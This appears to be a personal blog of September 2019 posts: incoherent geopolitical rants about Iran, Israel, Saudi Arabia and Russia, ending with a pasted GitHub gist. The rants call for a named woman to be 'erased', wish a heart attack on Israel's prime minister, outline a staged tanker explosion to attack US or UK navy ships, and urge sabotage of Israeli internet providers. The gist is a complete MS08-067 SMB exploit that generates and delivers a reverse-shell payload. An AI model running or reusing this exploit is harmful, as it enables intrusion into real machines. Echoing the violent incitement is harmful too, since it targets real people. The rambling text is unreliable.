Wednesday, September 18, 2019


intel iran folder

the objective is the destruction of putagal. convincing iranians, syrians and NKs, to blow a nuclear cake, and saying, is not israel terratory at stake, but cash...their little cash, however affects russian cash...thats bad news. of course, in that case, supposly working for israel, means...not even 10 euros for yogurts...bcz Berlim is much more important, than my small fly pride issue. Therefore, small range missiles transfered fromn one vessel to another, covered by a chemical cargo, fait divers, that never left the boat on the way to iran, and then back to the sea...and the offload, is made by that type of gunmen, that if i could have my project done...could delievere in my hands...the weapon i give my life for


Saturday, September 14, 2019

Hello! Back to warfare! Accept my advise...beeing consider anarchysts, fucks all perspectives of winning any political status, or win a military based conflit. An anarchyst does not wear an an army cap, an army camouflage, an army boots. For the marketing of their system, that offical image, fucks media manipulation, social thinking. Watch the Serbians, basing a war on desgate of Nato spirit of action..4 days without one single shoot, inside an urban guerrilla, that if not made by a dressed army, would have ended on 3 months..and it lasted for 7 years. Look the IRA, showing up an image of para military. If you go for Bagdad suiciders your war is lost on the 1st day, poor fundamentalist bastards.



...take the gas out. Russia will audit. Anything goes...weird...you die ...intel politics folder

Mr Gantz...the palestinians dont rule themselfs, its true..but pure occupation is out of fashion since Hitler ocuppied Poland..that terratory is useless for agriculture and vines...someone like...my friends and I, have to pay from our taxes a big budget for setlers to saty with their asses on their little nice new houses, doing nothing..and pretending they are real citzens...occupation should not be the right concept, of your ambitioouse big penis. More a pacification region type, of speech and action. On the other hand...women dont like big penis,is a myth...but...you dont like women, anyway ...

 To answer...you Eminence the King of Saudi Arabia....Irans regime will change naturally, and even faster with economic reforms. Those reforms of course, can be manipulated...Iran is here, and they do know that! ..New centrifugers, are just fait divers, since, the cost is unbearble, without a partner behind it..but Russia is here...ask them, yourself. On the other hand, even for the Russians, priviliged relations with the iranians, privatization of the nuclear centrals, would be, both profit for the czares, while they still exist as faraos, with the treatd of a new world order, who doenst count with their existence...either for the iranian youth, to live in peace.

 Im about to to say to the big smokers at the 3rd floor of the salomon avenue..that...10 years of Likud, attempts of gefallen Irans regime..were a totally failure...more 10 years, will go on beeing a Liebermans personal failure aussi. Iran proposal is much more ,economic turn around, solution...on a desk of a vanity arrogant military college rich boy...doing nothing...and at Economy...collapsing America. Why dont the beloved PM, tonight...as Putins eyes are looking at this big dog shit here....have a convenient heart attack, as Sharon...

 Mr. Joe Biden...Mr President...Isabella is a ugly envy woman, milionaire bitch, that created the Cinderela fairy tale...she must be...erased, deleted...not bcz the world wont change...with our arms and perspectives...but bcz she indangerouse a little wall ruine of a Temple. Better play safe...and silence the little trilionaire hooker. By the way...Mr President...when you born in a certain...level...social class...you dont strike your ex husband..in public or in private...with the bad smell of his feet.

 via GIPHY

surprise factor ///warfare folder....attack Iran vs US

remove a mine from a oil tanker full with methanol, as a normal operation of security...get close the oil tanker from a US or UK navy ship, so it can kill...then acidentally exploded it...as soon as they show up with drones, light laser crossing the skyp, the areas they want to erase...and then hit with missiles strike...after one! hit of them on your soil....2 naval ships...choose the ones that will block the F16s from flying over your coast bcz of the smoke, both north and south cardinals

 strike Israel with sabotage port 1028 TCP, where they have all their firewalls..forget Elbit ...strike ...hit
Hot-Net internet services Ltd.
Cellcom Fixed Line Communication L.P.
Bezeq International-Ltd

Friday, September 13, 2019

2019 SEH Buffer Overflow Exploit drones attack hack folder

Instantly share code, notes, and snippets.

@thel3l thel3l/ms08-067-fixed.py
Created last year

Code
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct
import time
import sys
import subprocess # Added to integrate msfvenom payload generation functionality
from threading import Thread #Thread is imported incase you would like to modify
try:
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
if __name__ == '__main__':
try:
target = sys.argv[1]
os = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
except IndexError:
print ''
print ' ____________________________________________'
print ' | |'
print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |'
print ' | Based On Ported MSF Exploit By EKOZ |'
print ' |____________________________________________|'
print ' | |'
print ' | USAGE |'
print ' | MS08-067.py |'
print ' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |'
print ' |____________________________________________|'
print ' | |'
print ' | TARGET OS SELECTION |'
print ' | 1 = Windows XP SP0/SP1 Universal |'
print ' | 2 = Windows 2000 Universal |'
print ' | 3 = Windows 2003 SP0 Universal |'
print ' | 4 = Windows 2003 SP1 English |'
print ' | 5 = Windows XP SP3 French (NX) |'
print ' | 6 = Windows XP SP3 English (NX) |'
print ' | 7 = Windows XP SP3 English (AlwaysOn NX) |'
print ' |____________________________________________|\r\n'
print ' I suggest you use a stageless payload to avoid issues with the handler.'
sys.exit(-1)
#badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes
#EXITFUNC=thread Important!
# msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
# Auto Generate Reverse Shell Payload Using msfvenom
mksh = "msfvenom -p windows/shell_reverse_tcp"
mksh += " -b \'\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\'"
mksh += " -e x86/call4_dword_xor"
mksh += " EXITFUNC=thread"
mksh += " --nopsled=32"
mksh += " LHOST="+lhost
mksh += " LPORT="+lport
mksh += " -f python "
mksh += " -a x86"
mksh += " -o RevPld.py"
print ' ____________________________________________'
print ' | |'
print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |'
print ' | Based On Ported MSF Exploit By EKOZ |'
print ' |____________________________________________|\r\n'
try:
print "[+] Attempting To Generate Reverse Shell Payload ..."
vnm = subprocess.Popen(mksh.split(), stdout=subprocess.PIPE)
vnm.wait()
print "[+] Reverse Shell Payload Generated Successfully..."
except:
print "[!] ERROR: Couldn't Generate Payload "
sys.exit(-1)
from RevPld import buf
nops = "\x90"*30
nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
gadget1="\x90\x5a\x59\xc3"
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
gadget3="\xcc\x90\xeb\x5a"
ret=struct.pack(''
, 0x00018000)
ret+=struct.pack(''
, rvas['call_HeapCreate']+module_base)
ret+=struct.pack(''
, 0x01040110)
ret+=struct.pack(''
, 0x01010101)
ret+=struct.pack(''
, 0x01010101)
ret+=struct.pack(''
, rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
ret+=struct.pack(''
, rvas['pop ecx / ret']+module_base)
ret+=gadget1
ret+=struct.pack(''
, rvas['mov [eax], ecx / ret']+module_base)
ret+=struct.pack(''
, rvas['jmp eax']+module_base)
ret+=gadget2[0]
ret+=gadget2[1]
ret+=struct.pack(''
, rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack(''
, rvas['pop ecx / ret']+module_base)
ret+=gadget2[2]
ret+=struct.pack(''
, rvas['mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack(''
, rvas['add eax, 8 / ret']+module_base)
ret+=struct.pack(''
, rvas['jmp eax']+module_base)
ret+=gadget3
return ret
class SRVSVC_Exploit(Thread):
def __init__(self, target, os, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.os = os
def __DCEPacket(self):
if (self.os=='1'):
print '[+] Targeting : Windows XP SP0/SP1 Universal'
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif (self.os=='2'):
print '[+] Targeting : Windows 2000 Universal'
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif (self.os=='3'):
print '[+] Targeting : Windows 2003 SP0 Universal'
ret = "\x9e\x12\x00\x01" #0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif (self.os=='4'):
print '[+] Targeting : Windows 2003 SP1 English'
ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
elif (self.os=='5'):
print '[+] Targeting : Windows XP SP3 French (NX)'
ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='6'):
print '[+] Targeting : Windows XP SP3 English (NX)'
ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='7'):
print '[+] Targeting : Windows XP SP3 English (AlwaysOn NX)'
rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case.
else:
print '[+] OS Version Not Supported\n'
sys.exit(-1)
print '[+] Initiating Connection To '+target+":445"
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
path ="\x5c\x00"+"ABCDEFGHIJ"*10 + nops + buf +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
path += "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
current = SRVSVC_Exploit(target, os)
current.start()
print "Now start up a multi/handler with your payload options set to: "
print "payload windows/shell_reverse_tcp" # seems to be the most stable and consistent.
print "LHOST ", lhost
print "LPORT ", lport
to join this conversation on GitHub. Already have an account? Sign in to comment
  •